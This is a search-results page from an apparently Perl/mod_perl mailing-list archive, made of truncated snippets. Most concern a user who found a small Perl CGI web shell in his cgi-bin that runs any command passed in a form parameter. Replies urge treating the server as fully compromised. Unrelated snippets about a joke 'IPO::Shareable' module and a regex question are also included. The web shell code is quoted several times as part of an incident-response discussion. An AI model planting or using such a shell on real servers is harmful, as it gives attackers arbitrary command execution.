http://www.chkrootkit.org/
http://www.incident-response.org/LKM.htm
--
Carsten Heinrigs
Ocean-7 Development
Tel: 212 533-7883
Assuming the content isn't updated too often, burning
the site from a test area and mounting it as a CDROM
makes it pretty hard for outsiders to udpate.
--
Steven Lembark 2930 W. Palmer
Workhorse Computing Chicago, IL 60647
At 14:15 21.03.2002 -0600, you wrote:
>Any idea as to how it got on my server. It is owned by apache and in the
>apache group. That tells me that it was put on there by apache. It is in a
>directory that has the permissions 777 because the script that is normally
>in there keeps and writes traf
>>Chris Reinhardt wrote:
>>
>>>On Thu, 21 Mar 2002, John Michael wrote:
>>>
>>>
>>>
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("g");
my $a=param("s");
if ($a || $k) {
$l=`$k 2>&1`;
print start_form,textarea("g",$k,1,50);
print sub
-- Perrin Harkins <[EMAIL PROTECTED]> on 03/21/02 17:07:27 -0500
> darren chamberlain wrote:
>> Another alternative is to replace it with something that appears
>> to do the same thing, but actually logs a ton of stuff from the
>> requestor.
>
> You can't trust any part of compromised box, rig
At 4:58 PM -0500 3/21/02, darren chamberlain wrote:
>Another alternative is to replace it with something that appears
>to do the same thing, but actually logs a ton of stuff from the
>requestor.
Unless the entire site has already been backdoored. If that is the
case, then this would serve no pu
darren chamberlain wrote:
> Another alternative is to replace it with something that appears
> to do the same thing, but actually logs a ton of stuff from the
> requestor.
You can't trust any part of compromised box, right down to the 'ls'
command. Once you know someone has been able to run arb
Quoting Ged Haywood <[EMAIL PROTECTED]> [Mar 21, 2002 16:15]:
> > Any idea as to how it got on my server.
>
> Nope. There are a thousand ways it could have been done if
> your server is not carefully secured. Do waht Perrin said -
> take it offline, it can't be trusted - and read the CERT stuff
Hi there,
On Thu, 21 Mar 2002, John Michael wrote:
> Any idea as to how it got on my server.
Nope. There are a thousand ways it could have been done if your
server is not carefully secured. Do waht Perrin said - take it
offline, it can't be trusted - and read the CERT stuff that you've
been p
CTED]>
cc: [EMAIL PROTECTED] (bcc: Wesley
Sheldahl/Lex/Lexmark)
Subject: Re: Off topic question & a little worried
John Michael wrote:
> Any idea as to how it got on my server.
Someone found a serious security hole in something you're running. You
have to assume that your se
John Michael wrote:
> Any idea as to how it got on my server.
Someone found a serious security hole in something you're running. You
have to assume that your server has been completely compromised and that
the entire world now has root access to it through a hundred backdoors
they installed.
Any idea as to how it got on my server. It is owned by apache and in the
apache group. That tells me that it was put on there by apache. It is in a
directory that has the permissions 777 because the script that is normally
in there keeps and writes traffic information, so I guess someone found
Chris Reinhardt wrote:
> On Thu, 21 Mar 2002, John Michael wrote:
>
>
>>#!/usr/bin/perl
>>use CGI qw(:standard);
>>print header;
>>my $k=param("g");
>>my $a=param("s");
>>if ($a || $k) {
>>$l=`$k 2>&1`;
>>print start_form,textarea("g",$k,1,50);
>>print submit("sc");
>>print end_f
On Thu, 21 Mar 2002, John Michael wrote:
> #!/usr/bin/perl
> use CGI qw(:standard);
> print header;
> my $k=param("g");
> my $a=param("s");
> if ($a || $k) {
> $l=`$k 2>&1`;
> print start_form,textarea("g",$k,1,50);
> print submit("sc");
> print end_form;
> print pre($l);
> }
Hi
I found this script in one of my cgi-bin's.Not sure where it came from.
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param("g");
my $a=param("s");
if ($a || $k) {
$l=`$k 2>&1`;
print start_form,textarea("g",$k,1,50);
print submit("sc");
print end_form;
Hello all,
I have a perl question which is somewhat related because I'm trying to
write a mod_perl script but I'm stuck with this.
I need to search a flat file for either a specific user name, or for all
users. what I want to do is something like this...
...
if ($user_name =~ /all/)
{
$regex
> use IPO::Shareable qw(:NYSE);
>
> my $ipo = IPO::Shareable->new($company);
> $ipo->is_internet();
> hype $ipo; # dangerous indirect syntax!
> my $shares = $ipo->invest($LITTLE);
> $ipo->inflate($HUGE); # Note that HUGE is not really a constant
> $ipo->sell($shares); # may need t
On Thu, 6 Apr 2000, Perrin Harkins wrote:
> On Thu, 6 Apr 2000, Niral Trivedi wrote:
> > This book has a topic in it in which it has given an example using a
> > module called 'IPO::Shareable' which is available from CPAN site..
>
> =head1 NAME
>
> IPO::Shareable - Perl extension to get rich qu
You failed to mention that this module requires:
IPO::BuzzWords qw(:xml :b2b :asp :wha)
Angel::Investor
and
Location::PaloAlto qw(:noMatterWhatItCosts)
Thanks Perrin
Tobias
At 03:15 PM 4/6/00 -0700, Perrin Harkins wrote:
>=head1 NAME
>
>IPO::Shareable - Perl extens
On Thu, 6 Apr 2000, Niral Trivedi wrote:
> This book has a topic in it in which it has given an example using a
> module called 'IPO::Shareable' which is available from CPAN site..
=head1 NAME
IPO::Shareable - Perl extension to get rich quick
=head1 SYNOPSIS
use IPO::Shareable qw(:NYSE);
All,
I am not sure whether this is the right group to post this question.. I
have found this thing in book "Writing Apache Modules with PERL and C"
from O'Reilly..
This book has a topic in it in which it has given an example using a
module called 'IPO::Shareable' which is available from CPAN sit
21 matches
Mail list logo
